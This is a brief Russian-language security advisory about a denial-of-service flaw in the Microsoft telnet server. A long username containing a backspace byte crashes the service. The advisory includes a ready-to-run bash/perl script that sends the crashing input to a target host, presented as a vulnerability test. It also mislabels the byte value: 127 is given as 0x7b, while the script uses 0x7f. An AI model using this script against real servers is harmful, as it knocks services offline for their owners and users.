Security Lab

Дополнительная информация о возможности DOS для MS telnet

Дата публикации:13.06.2001
Дата изменения:17.10.2006
Всего просмотров:1965
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Как стало известно, DOS происходит если буфер, в который заноситься имя пользователя при входе в систему, превышает 4300 знаков, и посылаемый код содержит 127(0x7b, backspace). Это приведет к краху сервера с ошибкой 0x41414141 .

Для проверки на уязвимость используйте следующий скрипт:



- test.sh -

#!/bin/bash

( sleep 1

perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'

sleep 3

) | telnet victimbox

- eof -